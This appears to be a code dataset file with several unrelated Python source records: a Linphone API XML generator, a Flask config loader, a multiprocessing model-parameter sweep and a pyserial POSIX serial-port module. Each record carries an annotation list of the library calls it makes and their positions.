destroyable = True
classNodeAttributes = {
'name' : cclass.name,
'cfunctionprefix' : cclass.cFunctionPrefix,
'deprecated' : str(cclass.deprecated).lower(),
'refcountable' : str(refcountable).lower(),
'destroyable' : str(destroyable).lower()
}
# Generate the XML node for the class
classNode = ET.SubElement(classesNode, 'class', classNodeAttributes)
if len(cclass.events) > 0:
eventsNode = ET.SubElement(classNode, 'events')
eventnames = []
for eventname in cclass.events:
eventnames.append(eventname)
eventnames.sort()
for eventname in eventnames:
self.__generateFunction(eventsNode, 'event', cclass.events[eventname])
if len(cclass.classMethods) > 0:
classMethodsNode = ET.SubElement(classNode, 'classmethods')
methodnames = []
for methodname in cclass.classMethods:
methodnames.append(methodname)
methodnames.sort()
for methodname in methodnames:
self.__generateFunction(classMethodsNode, 'classmethod', cclass.classMethods[methodname])
if len(cclass.instanceMethods) > 0:
instanceMethodsNode = ET.SubElement(classNode, 'instancemethods')
methodnames = []
for methodname in cclass.instanceMethods:
methodnames.append(methodname)
methodnames.sort()
for methodname in methodnames:
self.__generateFunction(instanceMethodsNode, 'instancemethod', cclass.instanceMethods[methodname])
if len(cclass.properties) > 0:
propertiesNode = ET.SubElement(classNode, 'properties')
propnames = []
for propname in cclass.properties:
propnames.append(propname)
propnames.sort()
for propname in propnames:
propertyNodeAttributes = { 'name' : propname }
propertyNode = ET.SubElement(propertiesNode, 'property', propertyNodeAttributes)
if cclass.properties[propname].getter is not None:
self.__generateFunction(propertyNode, 'getter', cclass.properties[propname].getter)
if cclass.properties[propname].setter is not None:
self.__generateFunction(propertyNode, 'setter', cclass.properties[propname].setter)
if cclass.briefDescription != '':
classBriefDescriptionNode = ET.SubElement(classNode, 'briefdescription')
classBriefDescriptionNode.text = cclass.briefDescription
classNode.append(cclass.detailedDescription)
def generate(self, project):
print("Generating XML document of Linphone API to '" + self.__outputfile.name + "'")
apiNode = ET.Element('api')
project.enums.sort(key = lambda e: e.name)
if len(project.enums) > 0:
enumsNode = ET.SubElement(apiNode, 'enums')
for cenum in project.enums:
self.__generateEnum(cenum, enumsNode)
if len(project.classes) > 0:
classesNode = ET.SubElement(apiNode, 'classes')
project.classes.sort(key = lambda c: c.name)
for cclass in project.classes:
self.__generateClass(cclass, classesNode)
s = '<?xml version="1.0" encoding="UTF-8" ?>\n'.encode('utf-8')
s += ET.tostring(apiNode, 'utf-8')
if project.prettyPrint:
s = minidom.parseString(s).toprettyxml(indent='\t')
self.__outputfile.write(s)
def main(argv = None):
if argv is None:
argv = sys.argv
argparser = argparse.ArgumentParser(description="Generate XML version of the Linphone API.")
argparser.add_argument('-o', '--outputfile', metavar='outputfile', type=argparse.FileType('w'), help="Output XML file describing the Linphone API.")
argparser.add_argument('--verbose', help="Increase output verbosity", action='store_true')
argparser.add_argument('--pretty', help="XML pretty print", action='store_true')
argparser.add_argument('xmldir', help="XML directory generated by doxygen.")
args = argparser.parse_args()
if args.outputfile == None:
args.outputfile = open('api.xml', 'w')
project = Project()
if args.verbose:
project.verbose = True
if args.pretty:
project.prettyPrint = True
project.initFromDir(args.xmldir)
project.check()
gen = Generator(args.outputfile)
gen.generate(project)
if __name__ == "__main__":
sys.exit(main())
| [
"argparse.FileType",
"os.listdir",
"xml.etree.ElementTree.parse",
"argparse.ArgumentParser",
"metadoc.Parser",
"xml.etree.ElementTree.tostring",
"os.path.join",
"xml.etree.ElementTree.Element",
"xml.dom.minidom.parseString",
"xml.etree.ElementTree.SubElement",
"six.iteritems"
] | [((27754, 27839), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generate XML version of the Linphone API."""'}), "(description='Generate XML version of the Linphone API.'\n )\n", (27777, 27839), False, 'import argparse\n'), ((6873, 6889), 'metadoc.Parser', 'metadoc.Parser', ([], {}), '()\n', (6887, 6889), False, 'import metadoc\n'), ((21658, 21710), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumsNode', '"""enum"""', 'enumNodeAttributes'], {}), "(enumsNode, 'enum', enumNodeAttributes)\n", (21671, 21710), True, 'import xml.etree.ElementTree as ET\n'), ((22676, 22731), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['parentNode', 'nodeName', 'functionAttributes'], {}), '(parentNode, nodeName, functionAttributes)\n', (22689, 22731), True, 'import xml.etree.ElementTree as ET\n'), ((22986, 23046), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""return"""', 'returnValueAttributes'], {}), "(functionNode, 'return', returnValueAttributes)\n", (22999, 23046), True, 'import xml.etree.ElementTree as ET\n'), ((23168, 23208), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""arguments"""'], {}), "(functionNode, 'arguments')\n", (23181, 23208), True, 'import xml.etree.ElementTree as ET\n'), ((24979, 25035), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classesNode', '"""class"""', 'classNodeAttributes'], {}), "(classesNode, 'class', classNodeAttributes)\n", (24992, 25035), True, 'import xml.etree.ElementTree as ET\n'), ((27044, 27061), 'xml.etree.ElementTree.Element', 'ET.Element', (['"""api"""'], {}), "('api')\n", (27054, 27061), True, 'import xml.etree.ElementTree as ET\n'), ((27539, 27568), 'xml.etree.ElementTree.tostring', 'ET.tostring', (['apiNode', '"""utf-8"""'], {}), "(apiNode, 'utf-8')\n", (27550, 27568), True, 'import xml.etree.ElementTree as ET\n'), ((20936, 20959), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\n', (20948, 20959), False, 'import os\n'), ((21148, 21175), 'six.iteritems', 'six.iteritems', (['c.properties'], {}), '(c.properties)\n', (21161, 21175), False, 'import six\n'), ((21776, 21819), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '"""briefdescription"""'], {}), "(enumNode, 'briefdescription')\n", (21789, 21819), True, 'import xml.etree.ElementTree as ET\n'), ((21971, 22004), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '"""values"""'], {}), "(enumNode, 'values')\n", (21984, 22004), True, 'import xml.etree.ElementTree as ET\n'), ((23459, 23523), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['argumentsNode', '"""argument"""', 'argumentNodeAttributes'], {}), "(argumentsNode, 'argument', argumentNodeAttributes)\n", (23472, 23523), True, 'import xml.etree.ElementTree as ET\n'), ((23665, 23712), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""briefdescription"""'], {}), "(functionNode, 'briefdescription')\n", (23678, 23712), True, 'import xml.etree.ElementTree as ET\n'), ((25081, 25115), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""events"""'], {}), "(classNode, 'events')\n", (25094, 25115), True, 'import xml.etree.ElementTree as ET\n'), ((25388, 25428), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""classmethods"""'], {}), "(classNode, 'classmethods')\n", (25401, 25428), True, 'import xml.etree.ElementTree as ET\n'), ((25739, 25782), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""instancemethods"""'], {}), "(classNode, 'instancemethods')\n", (25752, 25782), True, 'import xml.etree.ElementTree as ET\n'), ((26095, 26133), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""properties"""'], {}), "(classNode, 'properties')\n", (26108, 26133), True, 'import xml.etree.ElementTree as ET\n'), ((26762, 26806), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""briefdescription"""'], {}), "(classNode, 'briefdescription')\n", (26775, 26806), True, 'import xml.etree.ElementTree as ET\n'), ((27151, 27182), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '"""enums"""'], {}), "(apiNode, 'enums')\n", (27164, 27182), True, 'import xml.etree.ElementTree as ET\n'), ((27304, 27337), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '"""classes"""'], {}), "(apiNode, 'classes')\n", (27317, 27337), True, 'import xml.etree.ElementTree as ET\n'), ((27908, 27930), 'argparse.FileType', 'argparse.FileType', (['"""w"""'], {}), "('w')\n", (27925, 27930), False, 'import argparse\n'), ((20565, 20576), 'xml.etree.ElementTree.parse', 'ET.parse', (['f'], {}), '(f)\n', (20573, 20576), True, 'import xml.etree.ElementTree as ET\n'), ((20969, 20987), 'os.listdir', 'os.listdir', (['xmldir'], {}), '(xmldir)\n', (20979, 20987), False, 'import os\n'), ((22152, 22216), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumValuesNode', '"""value"""', 'enumValuesNodeAttributes'], {}), "(enumValuesNode, 'value', enumValuesNodeAttributes)\n", (22165, 22216), True, 'import xml.etree.ElementTree as ET\n'), ((26341, 26406), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['propertiesNode', '"""property"""', 'propertyNodeAttributes'], {}), "(propertiesNode, 'property', propertyNodeAttributes)\n", (26354, 26406), True, 'import xml.etree.ElementTree as ET\n'), ((22287, 22331), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['valueNode', '"""briefdescription"""'], {}), "(valueNode, 'briefdescription')\n", (22300, 22331), True, 'import xml.etree.ElementTree as ET\n'), ((27602, 27624), 'xml.dom.minidom.parseString', 'minidom.parseString', (['s'], {}), '(s)\n', (27621, 27624), True, 'import xml.dom.minidom as minidom\n'), ((21007, 21030), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\n', (21019, 21030), False, 'import os\n')] |
import configparser
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
dir_path += '/cfg.ini'
class Configuration(object):
def __init__(self,debug=False):
section = "Flask-debug" if debug else "Flask"
cfg = configparser.ConfigParser()
cfg.read(dir_path if debug else "/var/www/html/flaskApp/cfg.ini")
self.debug = cfg.getboolean(section, "DEBUG")
self.csrf_enabled = cfg.getboolean(section,"CSRF_ENABLED")
self.threads_per_page = cfg.getint(section,"THREADS_PER_PAGE")
self.port = cfg.getint(section,"PORT")
self.host = cfg.get(section,"HOST")
| [
"os.path.realpath",
"configparser.ConfigParser"
] | [((62, 88), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (78, 88), False, 'import os\n'), ((256, 283), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (281, 283), False, 'import configparser\n')] |
from multiprocessing import Pool
import EnvEq as ee
import numpy as np
import itertools as it
import os
#parsing input into numpy arrays
from input import *
y0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test])
p=np.array([p_o2,p_test])
mu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]])
lam=np.array([lam_o2,lam_test])
t_D=np.array([t_DTpos,t_DTpro,t_DTneg])
r=np.array([r_Tpos,r_Tpro,r_Tneg])
delta=np.array([delta_Tpos,delta_Tpro,delta_Tneg])
rho=np.array([rho_Tpos,rho_Tpro,rho_Tneg])
lim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64)
#make directories for saving raw_outputs
try:
os.makedirs("../../raw_output/EnvEq/"+f_name)
except:
pass
#iterator over these
o2_lim_arr=np.empty([0,2])
for ulim_Tpro in np.arange(0.1,1,0.2):
for ulim_Tneg in np.arange(0.1,1,0.2):
o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0)
def solve_parm(u_lim_o2): #calls the solve_eq function with all default inputs other than o2_lim
f_name_i=f_name+"{:.1f}".format(u_lim_o2[0])+"-"+"{:.1f}".format(u_lim_o2[1])
lim[0,1,1]=u_lim_o2[0]
lim[0,2,1]=u_lim_o2[1]
ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i)
if __name__ == '__main__':
pool = Pool(4)
pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims
pool.close()
pool.join()
| [
"EnvEq.solve_eq",
"os.makedirs",
"numpy.append",
"numpy.array",
"numpy.empty",
"multiprocessing.Pool",
"numpy.arange"
] | [((161, 214), 'numpy.array', 'np.array', (['[y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test]'], {}), '([y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test])\n', (169, 214), True, 'import numpy as np\n'), ((213, 237), 'numpy.array', 'np.array', (['[p_o2, p_test]'], {}), '([p_o2, p_test])\n', (221, 237), True, 'import numpy as np\n'), ((240, 316), 'numpy.array', 'np.array', (['[[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]]'], {}), '([[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]])\n', (248, 316), True, 'import numpy as np\n'), ((316, 344), 'numpy.array', 'np.array', (['[lam_o2, lam_test]'], {}), '([lam_o2, lam_test])\n', (324, 344), True, 'import numpy as np\n'), ((348, 385), 'numpy.array', 'np.array', (['[t_DTpos, t_DTpro, t_DTneg]'], {}), '([t_DTpos, t_DTpro, t_DTneg])\n', (356, 385), True, 'import numpy as np\n'), ((386, 420), 'numpy.array', 'np.array', (['[r_Tpos, r_Tpro, r_Tneg]'], {}), '([r_Tpos, r_Tpro, r_Tneg])\n', (394, 420), True, 'import numpy as np\n'), ((425, 471), 'numpy.array', 'np.array', (['[delta_Tpos, delta_Tpro, delta_Tneg]'], {}), '([delta_Tpos, delta_Tpro, delta_Tneg])\n', (433, 471), True, 'import numpy as np\n'), ((474, 514), 'numpy.array', 'np.array', (['[rho_Tpos, rho_Tpro, rho_Tneg]'], {}), '([rho_Tpos, rho_Tpro, rho_Tneg])\n', (482, 514), True, 'import numpy as np\n'), ((517, 725), 'numpy.array', 'np.array', (['[[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [l_lim_o2Tneg,\n u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [l_lim_testTpro,\n u_lim_testTpro], [0, 0]]]'], {'dtype': 'np.float64'}), '([[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [\n l_lim_o2Tneg, u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [\n l_lim_testTpro, u_lim_testTpro], [0, 0]]], dtype=np.float64)\n', (525, 725), True, 'import numpy as np\n'), ((852, 868), 'numpy.empty', 'np.empty', (['[0, 2]'], {}), '([0, 2])\n', (860, 868), True, 'import numpy as np\n'), ((885, 907), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\n', (894, 907), True, 'import numpy as np\n'), ((755, 802), 'os.makedirs', 'os.makedirs', (["('../../raw_output/EnvEq/' + f_name)"], {}), "('../../raw_output/EnvEq/' + f_name)\n", (766, 802), False, 'import os\n'), ((928, 950), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\n', (937, 950), True, 'import numpy as np\n'), ((1261, 1332), 'EnvEq.solve_eq', 'ee.solve_eq', (['t_max', 'dt', 'y0', 'p', 'mu', 'lam', 'r', 'K', 'delta', 'rho', 'lim', 'f_name_i'], {}), '(t_max, dt, y0, p, mu, lam, r, K, delta, rho, lim, f_name_i)\n', (1272, 1332), True, 'import EnvEq as ee\n'), ((1361, 1368), 'multiprocessing.Pool', 'Pool', (['(4)'], {}), '(4)\n', (1365, 1368), False, 'from multiprocessing import Pool\n'), ((969, 1024), 'numpy.append', 'np.append', (['o2_lim_arr', '[[ulim_Tpro, ulim_Tneg]]'], {'axis': '(0)'}), '(o2_lim_arr, [[ulim_Tpro, ulim_Tneg]], axis=0)\n', (978, 1024), True, 'import numpy as np\n')] |
#!/usr/bin/env python
#
# Python Serial Port Extension for Win32, Linux, BSD, Jython
# module for serial IO for POSIX compatible systems, like Linux
# see __init__.py
#
# (C) 2001-2010 <NAME> <<EMAIL>>
# this is distributed under a free software license, see license.txt
#
# parts based on code from <NAME> <<EMAIL>>:
# ftp://ftp.visi.com/users/grante/python/PosixSerial.py
#
# references: http://www.easysw.com/~mike/serial/serial.html
import sys, os, fcntl, termios, struct, select, errno, time
from .serialutil import *
# Do check the Python version as some constants have moved.
if (sys.hexversion < 0x020100f0):
import TERMIOS
else:
TERMIOS = termios
if (sys.hexversion < 0x020200f0):
import FCNTL
else:
FCNTL = fcntl
# try to detect the OS so that a device can be selected...
# this code block should supply a device() and set_special_baudrate() function
# for the platform
plat = sys.platform.lower()
if plat[:5] == 'linux': # Linux (confirmed)
def device(port):
return '/dev/ttyS%d' % port
ASYNC_SPD_MASK = 0x1030
ASYNC_SPD_CUST = 0x0030
def set_special_baudrate(port, baudrate):
import array
buf = array.array('i', [0] * 32)
# get serial_struct
FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf)
# set custom divisor
buf[6] = buf[7] / baudrate
# update flags
buf[4] &= ~ASYNC_SPD_MASK
buf[4] |= ASYNC_SPD_CUST
# set serial_struct
try:
res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf)
except IOError:
raise ValueError('Failed to set custom baud rate: %r' % baudrate)
baudrate_constants = {
0: 0000000, # hang up
50: 0o000001,
75: 0o000002,
110: 0o000003,
134: 0o000004,
150: 0o000005,
200: 0o000006,
300: 0o000007,
600: 0o000010,
1200: 0o000011,
1800: 0o000012,
2400: 0o000013,
4800: 0o000014,
9600: 0o000015,
19200: 0o000016,
38400: 0o000017,
57600: 0o010001,
115200: 0o010002,
230400: 0o010003,
460800: 0o010004,
500000: 0o010005,
576000: 0o010006,
921600: 0o010007,
1000000: 0o010010,
1152000: 0o010011,
1500000: 0o010012,
2000000: 0o010013,
2500000: 0o010014,
3000000: 0o010015,
3500000: 0o010016,
4000000: 0o010017
}
elif plat == 'cygwin': # cygwin/win32 (confirmed)
def device(port):
return '/dev/com%d' % (port + 1)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat == 'openbsd3': # BSD (confirmed)
def device(port):
return '/dev/ttyp%d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:3] == 'bsd' or \
plat[:7] == 'freebsd' or \
plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d)
def device(port):
return '/dev/cuad%d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:6] == 'darwin': # OS X
version = os.uname()[2].split('.')
# Tiger or above can support arbitrary serial speeds
if int(version[0]) >= 8:
def set_special_baudrate(port, baudrate):
# use IOKit-specific call to set up high speeds
import array, fcntl
buf = array.array('i', [baudrate])
IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t)
fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1)
else: # version < 8
def set_special_baudrate(port, baudrate):
raise ValueError("baud rate not supported")
def device(port):
return '/dev/cuad%d' % port
baudrate_constants = {}
elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk
def device(port):
return '/dev/dty%02d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:4] == 'irix': # IRIX (partially tested)
def device(port):
return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:2] == 'hp': # HP-UX (not tested)
def device(port):
return '/dev/tty%dp0' % (port+1)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed)
def device(port):
return '/dev/tty%c' % (ord('a')+port)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:3] == 'aix': # AIX
def device(port):
return '/dev/tty%d' % (port)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
else:
# platform detection has failed...
sys.stderr.write("""\
don't know how to number ttys on this system.
! Use an explicit path (eg /dev/ttyS1) or send this information to
! the author of this module:
sys.platform = %r
os.name = %r
serialposix.py version = %s
also add the device name of the serial port and where the
counting starts for the first serial port.
e.g. 'first serial port: /dev/ttyS0'
and with a bit luck you can get this module running...
""" % (sys.platform, os.name, VERSION))
# no exception, just continue with a brave attempt to build a device name
# even if the device name is not correct for the platform it has chances
# to work using a string with the real device name as port parameter.
def device(portum):
return '/dev/ttyS%d' % portnum
def set_special_baudrate(port, baudrate):
raise SerialException("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
#~ raise Exception, "this module does not run on this platform, sorry."
# whats up with "aix", "beos", ....
# they should work, just need to know the device names.
# load some constants for later use.
# try to use values from TERMIOS, use defaults from linux otherwise
TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415
TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416
TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417
TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418
#TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001
TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002
TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004
#TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008
#TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010
TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020
TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040
TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080
TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100
TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR
TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG
#TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000
#TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000
TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B
TIOCM_zero_str = struct.pack('I', 0)
TIOCM_RTS_str = struct.pack('I', TIOCM_RTS)
TIOCM_DTR_str = struct.pack('I', TIOCM_DTR)
TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427
TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428
class PosixSerial(SerialBase):
"""Serial port class POSIX implementation. Serial port configuration is
done with termios and fcntl. Runs on Linux and many other Un*x like
systems."""
def open(self):
"""Open port with current settings. This may throw a SerialException
if the port cannot be opened."""
self.fd = None
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
# open
try:
self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK)
except Exception as msg:
self.fd = None
raise SerialException("could not open port %s: %s" % (self._port, msg))
#~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking
try:
self._reconfigurePort()
except:
try:
os.close(self.fd)
except:
# ignore any exception when closing the port
# also to keep original exception that happened when setting up
pass
self.fd = None
raise
else:
self._isOpen = True
#~ self.flushInput()
def _reconfigurePort(self):
"""Set communication parameters on opened port."""
if self.fd is None:
raise SerialException("Can only operate on a valid file descriptor")
custom_baud = None
vmin = vtime = 0 # timeout is done via select
if self._interCharTimeout is not None:
vmin = 1
vtime = int(self._interCharTimeout * 10)
try:
iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd)
except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here
raise SerialException("Could not configure port: %s" % msg)
# set up raw mode / no echo / binary
cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD)
lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL|
TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT
for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk
if hasattr(TERMIOS, flag):
lflag &= ~getattr(TERMIOS, flag)
oflag &= ~(TERMIOS.OPOST)
iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK)
if hasattr(TERMIOS, 'IUCLC'):
iflag &= ~TERMIOS.IUCLC
if hasattr(TERMIOS, 'PARMRK'):
iflag &= ~TERMIOS.PARMRK
# setup baud rate
try:
ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate))
except AttributeError:
try:
ispeed = ospeed = baudrate_constants[self._baudrate]
except KeyError:
#~ raise ValueError('Invalid baud rate: %r' % self._baudrate)
# may need custom baud rate, it isn't in our list.
ispeed = ospeed = getattr(TERMIOS, 'B38400')
try:
custom_baud = int(self._baudrate) # store for later
except ValueError:
raise ValueError('Invalid baud rate: %r' % self._baudrate)
else:
if custom_baud < 0:
raise ValueError('Invalid baud rate: %r' % self._baudrate)
# setup char len
cflag &= ~TERMIOS.CSIZE
if self._bytesize == 8:
cflag |= TERMIOS.CS8
elif self._bytesize == 7:
cflag |= TERMIOS.CS7
elif self._bytesize == 6:
cflag |= TERMIOS.CS6
elif self._bytesize == 5:
cflag |= TERMIOS.CS5
else:
raise ValueError('Invalid char len: %r' % self._bytesize)
# setup stopbits
if self._stopbits == STOPBITS_ONE:
cflag &= ~(TERMIOS.CSTOPB)
elif self._stopbits == STOPBITS_ONE_POINT_FIVE:
cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. there is no POSIX support for 1.5
elif self._stopbits == STOPBITS_TWO:
cflag |= (TERMIOS.CSTOPB)
else:
raise ValueError('Invalid stop bit specification: %r' % self._stopbits)
# setup parity
iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP)
if self._parity == PARITY_NONE:
cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD)
elif self._parity == PARITY_EVEN:
cflag &= ~(TERMIOS.PARODD)
cflag |= (TERMIOS.PARENB)
elif self._parity == PARITY_ODD:
cflag |= (TERMIOS.PARENB|TERMIOS.PARODD)
else:
raise ValueError('Invalid parity: %r' % self._parity)
# setup flow control
# xonxoff
if hasattr(TERMIOS, 'IXANY'):
if self._xonxoff:
iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY)
else:
iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY)
else:
if self._xonxoff:
iflag |= (TERMIOS.IXON|TERMIOS.IXOFF)
else:
iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF)
# rtscts
if hasattr(TERMIOS, 'CRTSCTS'):
if self._rtscts:
cflag |= (TERMIOS.CRTSCTS)
else:
cflag &= ~(TERMIOS.CRTSCTS)
elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name
if self._rtscts:
cflag |= (TERMIOS.CNEW_RTSCTS)
else:
cflag &= ~(TERMIOS.CNEW_RTSCTS)
# XXX should there be a warning if setting up rtscts (and xonxoff etc) fails??
# buffer
# vmin "minimal number of characters to be read. = for non blocking"
if vmin < 0 or vmin > 255:
raise ValueError('Invalid vmin: %r ' % vmin)
cc[TERMIOS.VMIN] = vmin
# vtime
if vtime < 0 or vtime > 255:
raise ValueError('Invalid vtime: %r' % vtime)
cc[TERMIOS.VTIME] = vtime
# activate settings
termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc])
# apply custom baud rate, if any
if custom_baud is not None:
set_special_baudrate(self, custom_baud)
def close(self):
"""Close port"""
if self._isOpen:
if self.fd is not None:
os.close(self.fd)
self.fd = None
self._isOpen = False
def makeDeviceName(self, port):
return device(port)
# - - - - - - - - - - - - - - - - - - - - - - - -
def inWaiting(self):
"""Return the number of characters currently in the input buffer."""
#~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str)
s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str)
return struct.unpack('I',s)[0]
# select based implementation, proved to work on many systems
def read(self, size=1):
"""Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read."""
if self.fd is None: raise portNotOpenError
read = bytearray()
while len(read) < size:
ready,_,_ = select.select([self.fd],[],[], self._timeout)
# If select was used with a timeout, and the timeout occurs, it
# returns with empty lists -> thus abort read operation.
# For timeout == 0 (non-blocking operation) also abort when there
# is nothing to read.
if not ready:
break # timeout
buf = os.read(self.fd, size-len(read))
# read should always return some data as select reported it was
# ready to read when we get to this point.
if not buf:
